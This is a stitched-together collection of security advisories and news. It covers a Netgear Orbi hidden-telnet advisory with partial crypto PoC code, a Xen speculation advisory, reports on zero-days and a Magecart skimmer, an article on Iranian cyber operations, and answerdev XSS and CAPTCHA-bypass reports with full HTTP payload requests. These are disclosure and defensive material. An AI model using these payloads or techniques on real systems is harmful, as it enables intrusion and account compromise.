A command execution vulnerability exists in the hidden telnet service functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

A command execution vulnerability exists in the hidden telnet service functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Router RBR750 4.6.8.5

**PRODUCT URLS**

Orbi Router RBR750 - https://www.netgear.com/support/product/RBR750

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-912 - Hidden Functionality

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

Previous to recent hardware and software updates, the Netgear Orbi router series had a hidden debug page containing a toggle switch to enable the telnet service on the device http://<router ip>/debug.htm. However, recent updates have removed this switch and seemingly the ability to enable the service at all. While the switch in the GUI no longer functioned/was removed, enabling the service was still possible by sending a specially-crafted trigger packet to UDP port 23 (https://github.com/bkerler/netgear\_telnet). While recent updates have seemingly broken this tool (and the many tools like it), the service does still exist and is still triggerable.

The newer codebase uses a modified version of the Blowfish algorithm, which appears to be similar to older Nintendo DS cartridge protection code. Specifically the crypt_64bit_up/down functions with the constants 0x12, 0x112, 0x212, and 0x312 in the PoC below.

    def crypt_64bit_up(self, x, y):
        sbox = self.flattened_sBox
        pArray = self.flattened_pArray
        for i in range(0, 0x10):
            z = pArray[i] ^ x
            x = sbox[0x012 - 0x12 + ((z>>24)&0xff)];
            x = sbox[0x112 - 0x12 + ((z>>16)&0xff)] + x;
            x = sbox[0x212 - 0x12 + ((z>> 8)&0xff)] ^ x;
            x = (sbox[0x312 - 0x12+ ((z>> 0)&0xff)] + x) & 0xFFFFFFFF;
            x = y ^ x
            y = z
        x = x ^ pArray[-2]
        y = y ^ pArray[-1]
        return (x, y)
    
    def crypt_64bit_down(self, x, y):
        sbox = self.flattened_sBox
        pArray = self.flattened_pArray
        for i in range(0x11, 1, -1):
            z = pArray[i] ^ x
            x = sbox[0x012 - 0x12 + ((z>>24)&0xff)];
            x = sbox[0x112 - 0x12 + ((z>>16)&0xff)] + x;
            x = sbox[0x212 - 0x12 + ((z>> 8)&0xff)] ^ x;
            x = (sbox[0x312 - 0x12+ ((z>> 0)&0xff)] + x) & 0xFFFFFFFF;
            x = y ^ x
            y = z
        x = x ^ pArray[1]
        y = y ^ pArray[0]
        return (x, y) 
    

To trigger and enable this service, a username, password and MAC address of the target device’s br-lan interface are required.

**Exploit Proof of Concept**

    $ ./enable_telnet_poc.py
    Plaintext payload:
    00000000: 43 38 39 45 34 33 34 44  45 38 37 38 00 00 00 00  C89E434DE878....
    00000010: 61 64 6D 69 6E 00 00 00  00 00 00 00 00 00 00 00  admin...........
    00000020: 50 61 73 73 77 30 72 64  00 00 00 00 00 00 00 00  Passw0rd........
    00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000050: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000060: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    Encrypted payload:
    00000000: D0 9C 30 F6 7D 98 82 EE  8F 14 65 9F B9 03 3C 8D  ..0.}.....e...<.
    00000010: D0 56 6C C4 13 EB 29 43  84 4B BB F5 B1 B0 C5 32  .Vl...)C.K.....2
    00000020: 63 CF 65 A2 BA 4F 87 8F  7C 82 89 28 32 95 7C 64  c.e..O..|..(2.|d
    00000030: 53 20 20 62 E2 F9 4B 3D  7C 82 89 28 32 95 7C 64  S  b..K=|..(2.|d
    00000040: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    00000050: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    00000060: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    00000070: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    
    $ telnet 10.0.0.1
    Trying 10.0.0.1...
    Connected to 10.0.0.1.
    Escape character is '^]'.
     === LOGIN ===============================
      Please enter your account and password,
      It's the same with DUT GUI
     ------------------------------------------
    telnet account: admin
    telnet password:
    
    BusyBox v1.30.1 () built-in shell (ash)
    
      .oooooo.             .o8        o8o           .o.       ooooooo  ooooo
     d8P'  `Y8b           "888        `"'          .888.       `8888    d8'
    888      888 oooo d8b  888oooo.  oooo         .8"888.        Y888..8P
    888      888 `888""8P  d88' `88b `888        .8' `888.        `8888'
    888      888  888      888   888  888       .88ooo8888.      .8PY888.
    `88b    d88'  888      888   888  888      .8'     `888.    d8'  `888b
     `Y8bood8P'  d888b     `Y8bod8P' o888o    o88o     o8888o o888o  o88888o
    
     ---------------------------------------------------------------
       For those about to rock... (Chaos Calmer, 10.0.3440.3644)
     ---------------------------------------------------------------
    root@RBR750:/#
    

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-03-21 - Public Release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2022-38452: TALOS-2022-1595 || Cisco Talos Intelligence Group

x86: speculative vulnerability in 32bit SYSCALL path Due to an oversight in the very original Spectre/Meltdown security work (XSA-254), one entrypath performs its speculation-safety actions too late. In some configurations, there is an unprotected RET instruction which can be attacked with a variety of speculative attacks.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Xen Security Advisory CVE-2022-42331 / XSA-429 version 3 x86: speculative vulnerability in 32bit SYSCALL path UPDATES IN VERSION 3 ==================== Public release. ISSUE DESCRIPTION ================= Due to an oversight in the very original Spectre/Meltdown security work (XSA-254), one entrypath performs its speculation-safety actions too late. In some configurations, there is an unprotected RET instruction which can be attacked with a variety of speculative attacks. IMPACT ====== An attacker might be able to infer the contents of arbitrary host memory, including memory assigned to other guests. VULNERABLE SYSTEMS ================== Xen versions 4.5 through 4.17 are vulnerable. Older versions are not vulnerable. Only x86 CPUs are potentially vulnerable. CPUs of other architectures are not vulnerable. The problematic codepath is only reachable on x86 CPUs which follow AMD's behaviour with respect to SYSCALL instructions from compatibility mode segments. This means that AMD and Hygon CPUs are potentially vulnerable, whereas Intel CPUs are not. Other vendors have not been checked. Only PV guests can leverage the vulnerability. On Xen 4.16 and later, the vulnerability is only present if 32bit PV guest support is compiled in - i.e. CONFIG\_PV32=y. On Xen 4.15 and older, all supported build configurations are vulnerable. The vulnerability is only present when booting on hardware that supports SMEP or SMAP (Supervisor Mode Execution/Access Prevention). This is believed to be some Family 0x16 models, and all later CPUs. MITIGATION ========== Not running untrusted PV guests will avoid the issue. CREDITS ======= This issue was discovered by Andrew Cooper of XenServer. RESOLUTION ========== Applying the appropriate attached patch resolves this issue. Note that patches for released versions are generally prepared to apply to the stable branches, and may not apply cleanly to the most recent release tarball. Downstreams are encouraged to update to the tip of the stable branch before applying these patches. xsa429.patch xen-unstable - Xen 4.16 xsa429-4.15.patch Xen 4.15 - Xen 4.14 $ sha256sum xsa429\* 2d7be90d917c475ab5217e657d2b44f5d8b107d9023dca034fcfb7feab07b2f0 xsa429.meta 36ed36dbfaad9e5df5fa87b9a3d9e9c531f476f97eeb2afe280aa238032a0540 xsa429.patch 7ac3d4182585e5d2d39231f10e7c0c9fcb972c82cf81cb884e95b628187de3a7 xsa429-4.15.patch $ DEPLOYMENT DURING EMBARGO ========================= Deployment of the patches and/or mitigations described above (or others which are substantially similar) is permitted during the embargo, even on public-facing systems with untrusted guest users and administrators. But: Distribution of updated software is prohibited (except to other members of the predisclosure list). Predisclosure list members who wish to deploy significantly different patches and/or mitigations, please contact the Xen Project Security Team. (Note: this during-embargo deployment notice is retained in post-embargo publicly released Xen Project advisories, even though it is then no longer applicable. This is to enable the community to have oversight of the Xen Project Security Team's decisionmaking.) For more information about permissible uses of embargoed information, consult the Xen Project community's agreed Security Policy: http://www.xenproject.org/security-policy.html -----BEGIN PGP SIGNATURE----- iQFABAEBCAAqFiEEI+MiLBRfRHX6gGCng/4UyVfoK9kFAmQZlWMMHHBncEB4ZW4u b3JnAAoJEIP+FMlX6CvZil4H/2b1DkLLz4RQqAgvaB8+SBeVLPqoZ7QxGLl8QXWT AMjFdy+M5T1OtbrMvEYCZNYhZnGOJgmVagERUvg/yZbPYx28NIHjG4+u90Ot6OId AQPqdrJ0wjEzN/ppNpnu1ALofAGbjsnAypEouGPh12gh5fcpcLQdT0rvpl2ff5f6 Qi4ShtUXhBiduBQcJ0TSneSCf5s7cq1+sMenntenK5Nrsvg7gu51YR45FyKyXdZc raonkGDny9kmDAjdKkywS2Au2763ph9nHbW5TbD17s65AKUDTupzk+QlFPhJLIP+ /gxDoUjKFiD/eY0AABWMAFGGvHFRNvdhTfUd6ImmWhqdEeE= =HxUJ -----END PGP SIGNATURE-----

CVE-2022-42331

As many as 55 zero-day vulnerabilities were exploited in the wild in 2022, with most of the flaws discovered in software from Microsoft, Google, and Apple.
While this figure represents a decrease from the year before, when a staggering 81 zero-days were weaponized, it still represents a significant uptick in recent years of threat actors leveraging unknown security flaws to their advantage.
The

Cyber Threat Intel / Vulnerability

As many as 55 zero-day vulnerabilities were exploited in the wild in 2022, with most of the flaws discovered in software from Microsoft, Google, and Apple.

While this figure represents a decrease from the year before, when a staggering 81 zero-days were weaponized, it still represents a significant uptick in recent years of threat actors leveraging unknown security flaws to their advantage.

The findings come from threat intelligence firm Mandiant, which noted that desktop operating systems (19), web browsers (11), IT and network management products (10), and mobile operating systems (six) accounted for the most exploited product types.

Of the 55 zero-day bugs, 13 are estimated to have been abused by cyber espionage groups, with four others exploited by financially motivated threat actors for ransomware-related operations. Commercial spyware vendors were linked to the exploitation of three zero-days.

Among state-sponsored groups, those attributed to China have emerged as the most prolific, exploiting seven zero-days – CVE-2022-24682, CVE-2022-1040, CVE-2022-30190, CVE-2022-26134, CVE-2022-42475, CVE-2022-27518, and CVE-2022-41328 – during the year.

Much of the exploitation has focused on vulnerabilities in edge network devices such as firewalls for obtaining initial access. Various China-nexus clusters have also been spotted leveraging a flaw in Microsoft Diagnostics Tool (aka Follina) as part of disparate campaigns.

"Multiple separate campaigns may indicate that the zero-day was distributed to multiple suspected Chinese espionage clusters via a digital quartermaster," Mandiant said, adding it points to the "existence of a shared development and logistics infrastructure and possibly a centralized coordinating entity."

North Korean and Russian threat actors, on the other hand, have been linked to the exploitation of two zero-days each. This includes CVE-2022-0609, CVE-2022-41128, CVE-2022-30190, and CVE-2023-23397.

The disclosure comes as threat actors are also getting better at turning newly disclosed vulnerabilities into powerful exploits for breaching a wide range of targets across the world.

"While the discovery of zero-day vulnerabilities is a resource-intensive endeavor and successful exploitation is not guaranteed, the total number of vulnerabilities disclosed and exploited has continued to grow, the types of targeted software, including Internet of Things (IoT) devices and cloud solutions, continue to evolve, and the variety of actors exploiting them has expanded," Mandiant said.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

The Mandiant report also follows a warning from Microsoft's Digital Threat Analysis Center about Russia's persistent kinetic and cyber targeting as the war in Ukraine continues into the second year.

The tech giant said since January 2023 it has observed "Russian cyber threat activity adjusting to boost destructive and intelligence gathering capacity on Ukraine and its partners' civilian and military assets."

It further warned of a possible "renewed destructive campaign" mounted by the nation-state group known as Sandworm (aka Iridium) on organizations located in Ukraine and elsewhere.

What's more, Moscow-backed hackers have deployed at least two ransomware and nine wiper families against over 100 Ukrainian entities. No less than 17 European countries have been targeted in espionage campaigns between January and mid-February 2023, and 74 countries have been targeted since the start of the war.

Other key traits associated with Russian threat activity include the use of ransomware as weapons of cyber sabotage, gaining initial access through diverse methods, and leveraging real and pseudo hacktivist groups to expand the reach of Moscow's cyber presence.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

From Ransomware to Cyber Espionage: 55 Zero-Day Vulnerabilities Weaponized in 2022

Categories: Threat Intelligence
Tags: magecart

Tags: skimmer

Tags: obfuscation

Tags: hunter

Tags: credit card

Tags: magento

The threat actor behind this operation is using an open-source JavaScript obfuscator to hide its code.



(Read more...)




The post A look at a Magecart skimmer using the Hunter obfuscator appeared first on Malwarebytes Labs.

Threat actors are notorious for trying to hide their code in various ways, from binary packers to obfuscators. On their own, these tools are not always malicious as they can also be be used by companies or individuals who wish to keep their work safe from piracy, but overall they tend to be largely abused.

In the case of credit card skimmers in client-side attacks, obfuscators are a common occurrence as they can make code identification more difficult. Defenders typically have the choice to either rely on the browser's debugger and step through the code, or can statically try to reverse it. The latter tends to be quite time consuming, but the former can often problematic if the malware author adds anti-debugging routines.

Today, we look at a Magecart skimmer that uses Hunter, a PHP Javascript obfuscator. During our investigation, we were able to discover a number of domains all part of the same infrastructure with custom skimmers for several Magento stores.

**Initial injection on e-commerce sites**

The attack relies on 2 steps: the first one is code injected inside the website's source that calls out a remote URL. That URL in turn, loads the skimmer within the payment checkout process.

We notice a large blurb of code that contains some static elements and others that are uniquely generated. The '_eval_' portion of the code is a clear giveaway that the random looking string is being processed dynamically to return some instructions.

The function (h,u,n,t,e,r) helps us to identify that this obfuscator is called Hunter and available on GitHub. To decode the obfuscated string, we can simply write out the content of _eval_ and we obtain a single line of JavaScript pointing to a URL.

This URL contains code that has been obfuscated with Hunter once again. This time, once we deobfuscate it, we see what appears to be HTML code with forms referring to credit card fields. This is the actual skimmer.

**Skimmer at checkout page**

When a victim who's shopping at a compromised online store goes to check out, there will be additional fields injected in the contact form that aren't normally there. Below is the legitimate checkout page of a store without the skimmer being loaded:

We can see that the payment process is on the bottom right hand side. In contrast, this is what the same page looks like when the skimmer is loaded:

Additional fields were inserted between the shopper's email address and name. In this case, the threat actor didn't do a very good job because the fields are in English while the rest is in Spanish.

The credit card data to be stolen is encoded, then stored inside a cookie and subsequently exfiltrated via a POST request.

******Infrastructure**

The skimmer domains registered with Porkbun all appear to be hosted on the same server at 193.201.9.116 (ASN49505):

We can get any of the currently still resolving domains to show their own version of the skimmer code by crafting a GET request with the proper referer:

The Hunter obfuscator is handy but quite easy to reverse and as such provides minimal stealth capabilities. Based on the skimmer code, this is not a very sophisticated attack probably limited to less than a hundred stores. However, this was the first time we encountered a Magecart skimmer using this kind of obfuscation and most endpoint security products are not detecting the client-side JavaScript.

Malwarebytes customers are shielded against this campaign via our web protection in End Protection (EP), Endpoint Detection and Response (EDR) and Malwarebytes Premium.

**Indicators of Compromise**

**Host:**

193.201.9.116

**Skimmer domains:**

1537la\[.\]buzz 

1537li\[.\]buzz 

1537lx\[.\]buzz 

1568la\[.\]buzz 

1568li\[.\]buzz 

1568lx\[.\]buzz 

1599la\[.\]buzz 

1599li\[.\]buzz 

1599lx\[.\]buzz 

1599lz\[.\]buzz 

appcloud1\[.\]buzz 

appcloud19\[.\]buzz 

appcloud2\[.\]buzz 

appcloud20\[.\]buzz 

appcloud3\[.\]buzz 

appcloud5\[.\]buzz 

araboxtv\[.\]sbs 

blindsmax\[.\]sbs 

bubapeq\[.\]quest 

dev-extension\[.\]cloud 

dev-extension\[.\]one 

dev-extension\[.\]us 

hedeya\[.\]sbs

hedeya\[.\]sbs 

inspirefitness\[.\]sbs 

motherearthlabs\[.\]sbs 

nasaservers\[.\]sbs 

newarriwal\[.\]quest 

paramountchemicals\[.\]sbs 

peqart\[.\]sbs 

remediadigital\[.\]sbs 

roboshop\[.\]sbs 

schmerzfrei-shop\[.\]sbs 

swsgswsg\[.\]sbs 

thecornerstoreau\[.\]sbs 

ultracoolfl\[.\]sbs

A look at a Magecart skimmer using the Hunter obfuscator

Amid ongoing protests, the Iranian regime has lost control of its image, pushing it to employ increasingly drastic tactics where everyone loses.

In the early hours of January 5, a popular anonymous Iranian dissident account called Jupiter announced on Twitter that his friends had killed Abolqasem Salavati, a maligned magistrate nicknamed the “Judge of Death.” The tweet went viral, and thousands of jubilant people poured into the account’s Twitter Space to thank them for assassinating the man responsible for sentencing hundreds of political prisoners to die.

Soon, however, a few attendees voiced doubts over the veracity of the claim. They were cursed at and kicked out of the room, as the host insisted, “Tonight is about celebration!” while repeatedly encouraging viewers to make the Space go viral. The next day, activists on the ground and Iranian media confirmed that Salavati was, in fact, alive. Several experts suspect Jupiter to have been an Islamic Republic of Iran cyber operation aimed at distracting people, while the Iranian government executed two protesters the same night as the Twitter Space.

Within its borders, the Iranian regime controls its population through one of the world’s toughest internet filtering systems, physical crackdowns, and mass arrests carried out with impunity. However, the IRI is vulnerable beyond its physical and virtual borders, as the regime struggles to contain the discourse and silence dissidents. To combat opposition narratives in the West and among VPN-armed domestic activists online, the IRI cyber army deploys multifaceted, devious, and sometimes clumsy tactics. With the ongoing political unrest in Iran, old cyber tactics have been ramped up, and new tricks that aim to distract, discredit, distort, and sow distrust have come to the fore as the regime finds itself in a critical moment.

Desperate Times, Desperate Measures

Among the tactics used by the IRI’s cyber agents—known colloquially as Cyberi—is old-school hacking. The Iran-linked hacker group Charming Kitten gained notoriety in 2020 for its spear-phishing attempts on journalists, scholars, and policy experts in the West. The group was recognized by its signature strategy of pretending to be reporters or researchers and feigning interest in their targets’ work as a pretext for setting up interview requests embedded with a spear-phishing link. Recent reports from the UK government’s National Cyber Security Center and security firm Mandiant found that such spear-phishing activities cyber groups TA453 and APT42, which are affiliated with the Iranian Revolutionary Guard Corps, have been increasingly prevalent. Last month, the popular anti-regime account RKOT claimed to have received an interview request geolocated to an IRGC department in Shiraz from an individual purporting to be a journalist from _The New York Times_. 

According to Amin Sabeti, founder of CERTFA, a cybersecurity collective specializing in uncovering state-backed Iranian cyber activities, these operations have shifted their methods over the past few months, since most targets of interest are aware of the threat and have learned to protect themselves from spear-phishing. Instead, Sabeti says, they now use a “domino effect” strategy by taking aim at low-profile targets, whose credentials they harvest in order to build trust and gain access to higher-profile targets in their network. Early this month, for example, the Iranian Canadian human rights activist Nazanin Afshin Jam said that she received a spear-phishing link from a trusted colleague who had been hacked.

“Right now, they go after everyone who they are interested in, in terms of this revolution, especially people who are working in nonprofits,” Sabeti says. 

Notably, some of these state actors establish credibility and trust over time by masking themselves as anti-regime voices and ardent supporters of the protest movement, or by building relationships with targets. One account by the name of Sara Shokouhi was created in October 2022 and claimed to be a Middle East scholar. The account spent months boosting opposition voices and writing heartfelt tributes to protesters before finally being outed by Iran experts as a state-sponsored phishing operation.

The ongoing protest movement in Iran has also given rise to more intense disinformation campaigns on social media. It is difficult to attribute the activities of anonymous accounts to the Iranian regime with certainty, since many regular Iranians are anonymous for security reasons. Occasionally, however, sloppiness—failing to delete old tweets or accidentally posting pro-regime messages on opposition sock puppet accounts—have revealed their likely affiliation with IRI intelligence.

The fast-paced, chaotic environment during protests within Iran has been ripe for disinformation and information pollution, making it too overwhelming to verify every claim even for researchers, says Simin Kargar, a nonresident fellow at the Atlantic Council’s Digital Forensic Research Lab. 

According to Kargar, the prospects of IRI disinformation operations shifting the narrative in the regime’s favor are slim. However, its cyber activity has had the effect of sowing doubt, where no one is sure what is true and who is trustworthy.

“Iranian information operations haven’t been successful in terms of the region and the type of attention they tend to draw,” she says. “But if their sole accomplishment in this situation is to make everyone doubt whatever is said, even by credible people, that's a big accomplishment for them. It's about creating a climate of fear and intimidation more than making people believe them. Because at this point of 44 years of the Islamic Republic, no one believes what they say.”

No One to Trust

Although widespread vigilance against IRI state actors has made the public less susceptible to propaganda tactics, it has simultaneously created an environment of distrust, where anybody is potentially a regime goon.

A recent study by Hossein Kermani, a political communications researcher at the University of Vienna, outlines the various tactics deployed by the Iranian cyber army that muddy the waters: “Downgrading discussions to the level of the government, justifying the state’s policies, cheering up other users, portraying that everything is normal, redirecting debates, spreading fake news, trending misleading hashtags, and mocking dissidents and activists.”

Some of these strategies were used to accuse the two journalists who covered the death of Mahsa Amini of being Mossad agents, portraying the prominent Iran-based activist Sepideh Qolian as “mentally ill and hysterical,” and pretending to be activists calling for violent uprisings in order to justify violent crackdowns. Pro-regime accounts also mimicked and hijacked anti-regime hashtags, which were subsequently flooded with pro-regime misinformation. And IRI cyber forces boosted the “Do execute” hashtag in response to activists trending “Do not execute” against the string of death penalty verdicts against protesters.

Beyond causing confusion, discrediting and undermining opposition has been an essential component of Iranian cyber activity. This has partially been pursued by hacking opposition figures directly but also through sock puppet accounts, which pit one faction of the opposition against another.

Kargar, of the Atlantic Council, believes that the Iranian cyber response to the recent anti-regime movement signals a smarter and more prudent approach. She describes how regime-affiliated cyber groups hack as much as possible and hold onto their material, sometimes for years, only to release it when it can have maximum effect. These efforts are part of a wider effort to create the impression that nobody is trustworthy and nobody is credible, she says. 

In late 2022, for instance, actress and activist Nazanin Boniadi began publicly collaborating with the son of the former shah, Reza Pahlavi, another popular opposition figure. Amid their attempts to present a unified front against the regime, the IRGC-affiliated hacker group Adl-e Ali sought to sow division by leaking old emails of Boniadi criticizing Pahlavi’s base of staunch monarchist supporters. With Pahlavi seeing a surge of popularity and credibility in the eyes of Western media in recent months, the hacker group has attempted to embarrass and discredit him by leaking old private photos and videos of Pahlavi snoring in his sleep, lying on the beach, and attending parties.

“If you can't win the hearts and minds, you might as well try to make everyone lose hearts and minds in one another. If you can’t win—make everyone else lose. That’s basically how they have been operating,” Kargar says.

While the regime might have lost the battle for the narrative, it has still had some successes, such as the “Judge of Death” distraction. Sabeti, the cybersecurity expert, believes that the case was an attempt by IRI cyber forces to test the waters toward future activities.

“I think it was to maybe the test the waters, to see how they can manage to change the narrative for the next \[execution\],” Sabeti says. “Because everyone knows it’s not the end of the story.”

The Scorched-Earth Tactics of Iran’s Cyber Army

Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.7.

**Description**

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

**Proof of Concept**

Posting the Question:

    func (req *QuestionAdd) Check() (errFields []*validator.FormErrorField, err error) {
        req.HTML = converter.Markdown2HTML(req.Content)
        for _, tag := range req.Tags {
            if len(tag.OriginalText) > 0 {
                tag.ParsedText = converter.Markdown2HTML(tag.OriginalText)
            }
        }
        return nil, nil
    }
    

Updating the Question:

    func (req *QuestionUpdate) Check() (errFields []*validator.FormErrorField, err error) {
        req.HTML = converter.Markdown2HTML(req.Content)
        return nil, nil
    }
    

Posting the Answer:

    func (req *AnswerAddReq) Check() (errFields []*validator.FormErrorField, err error) {
        req.HTML = converter.Markdown2HTML(req.Content)
        return nil, nil
    }
    

Updating the Answer:

    func (req *AnswerUpdateReq) Check() (errFields []*validator.FormErrorField, err error) {
        req.HTML = converter.Markdown2HTML(req.Content)
        return nil, nil
    }
    

Updating the Tag:

    func (r *UpdateTagReq) Check() (errFields []*validator.FormErrorField, err error) {
        if len(r.EditSummary) == 0 {
            r.EditSummary = "tag.edit.summary"
        }
        r.ParsedText = converter.Markdown2HTML(r.OriginalText)
        return nil, nil
    }
    

Addning a comment:

    func (req *AddCommentReq) Check() (errFields []*validator.FormErrorField, err error) {
        req.ParsedText = converter.Markdown2HTML(req.OriginalText)
        return nil, nil
    }
    

Updating a Comment:

    func (req *UpdateCommentReq) Check() (errFields []*validator.FormErrorField, err error) {
        req.ParsedText = converter.Markdown2HTML(req.OriginalText)
        return nil, nil
    }
    

Payload:

    <script>alert(1)<\\x00/script>
    <style></style><img src=x onerror=alert(1)//>
    

Request @ Question:

    POST /answer/api/v1/question HTTP/1.1
    Host: localhost:9080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
    Accept: */*
    Accept-Language: en_US
    Accept-Encoding: gzip, deflate
    Authorization: 13215c73-bced-11ed-bdbe-0242ac110002
    Content-Type: application/json
    Content-Length: 213
    Origin: http://localhost:9080
    Connection: close
    Referer: http://localhost:9080/questions/ask
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"title":"question","content":"<script>alert(1)<\\\\x00/script>\n<style></style><img src=x onerror=alert(1)//>","tags":[{"original_text":"","parsed_text":"","slug_name":"nano","recommend":false,"reserved":false}]}
    

Request @ Answer:

    POST /answer/api/v1/post/render HTTP/1.1
    Host: localhost:9080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
    Accept: */*
    Accept-Language: en_US
    Accept-Encoding: gzip, deflate
    Authorization: 13215c73-bced-11ed-bdbe-0242ac110002
    Content-Type: application/json
    Content-Length: 95
    Origin: http://localhost:9080
    Connection: close
    Referer: http://localhost:9080/questions/10010000000000007
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"content":"<script>alert(1)<\\\\x00/script>\n<style></style><img src=x onerror=alert(1)//>\n"}
    

Request @ Tag:

    PUT /answer/api/v1/tag HTTP/1.1
    Host: localhost:9080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
    Accept: */*
    Accept-Language: en_US
    Accept-Encoding: gzip, deflate
    Authorization: 13215c73-bced-11ed-bdbe-0242ac110002
    Content-Type: application/json
    Content-Length: 272
    Origin: http://localhost:9080
    Connection: close
    Referer: http://localhost:9080/tags/10030000000000002/edit
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"display_name":"a","slug_name":"a","original_text":"<script>alert(1)<\\\\x00/script>\n<style></style><img src=x onerror=alert(1)//>","parsed_text":"<style></style><img src=x onerror=alert(1)//><blockquote>\n</blockquote>\n","tag_id":"10030000000000002","edit_summary":""}
    

Request @ Comment:

    POST /answer/api/v1/comment HTTP/1.1
    Host: localhost:9080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
    Accept: */*
    Accept-Language: en_US
    Accept-Encoding: gzip, deflate
    Authorization: 1d798f13-bda1-11ed-9586-0242ac110002
    Content-Type: application/json
    Content-Length: 158
    Origin: http://localhost:9080
    Connection: close
    Referer: http://localhost:9080/questions/10010000000000012/nadahh
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"object_id":"10020000000000015","original_text":"<script>alert(1)<\\\\x00/script>\n<style></style><img src=x onerror=alert(1)//>","mention_username_list":[]}
    

**Impact**

The application stores dangerous data in a database, message forum, visitor log, or other trusted data store. At a later time, the dangerous data is subsequently read back into the application and included in dynamic content. From an attacker's perspective, the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs.

CVE-2023-1535: Multiple XSS @ answer/question/tag in answer

Guessable CAPTCHA in GitHub repository answerdev/answer prior to 1.0.6.

**Description**

So if we login incorrectly multiple times, we get captcha. Each captcha has "captcha\_id" and solve "captcha\_code" For example: "captcha\_code":"8awt" "captcha\_id":"7nToXDrT6SkJ2BJxKG1u" You can use same captcha code and captcha id in login without any problem

Captcha is generated with - http://34.245.133.152:9080/answer/api/v1/user/action/record?action=login

**Proof of Concept**

Login multiple times and get any captcha Captcha URL: http://34.245.133.152:9080/answer/api/v1/user/action/record?action=login

Type captcha code and login

Your request:

    POST /answer/api/v1/user/login/email HTTP/1.1
    Host: 34.245.133.152:9080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
    Accept: */*
    Accept-Language: en_US
    Accept-Encoding: gzip, deflate
    Authorization: 
    Content-Type: application/json
    Content-Length: 105
    Origin: http://34.245.133.152:9080
    Connection: close
    Referer: http://34.245.133.152:9080/users/login
    
    {"e_mail":"sdad@gmail.com","pass":"sdadssadda","captcha_code":"8awt","captcha_id":"7nToXDrT6SkJ2BJxKG1u"}
    ----------------------------------------------------------------
    
    Use this request as long as you want, with same captcha_code and same captcha_id
    
    Response you will get each time:
    ----------------------------------------------------------------
    HTTP/1.1 400 Bad Request
    Content-Type: application/json; charset=utf-8
    Date: Tue, 21 Feb 2023 12:44:12 GMT
    Content-Length: 186
    Connection: close
    
    {"code":400,"reason":"error.object.email_or_password_incorrect","msg":"Email and password do not match.","data":[{"error_field":"e_mail","error_msg":"Email and password do not match."}]}
    

You can use burpsuite and send it to intruder and add wordlist then check with 1000 requests. Result will be same.

**Impact**

The security measure is to require the user to solve a captcha after multiple failed login attempts. The captcha includes a "captcha\_code," which is the code the user must enter to prove they are human, and a "captcha\_id," which is a unique identifier for that particular captcha. Once a attacker solves 1 captcha, they can use the same "captcha\_code" and "captcha\_id" for subsequent login attempts without any issue.

CVE-2023-1539: Captcha Bypass on login in answer

An integer conversion vulnerability exists in the SORBAx64.dll RecvPacket functionality of WellinTech KingHistorian 35.01.00.05. A specially crafted network packet can lead to a buffer overflow. An attacker can send a malicious packet to trigger this vulnerability.

**SUMMARY**

An integer conversion vulnerability exists in the SORBAx64.dll RecvPacket functionality of WellinTech KingHistorian 35.01.00.05. A specially crafted network packet can lead to a buffer overflow. An attacker can send a malicious packet to trigger this vulnerability.

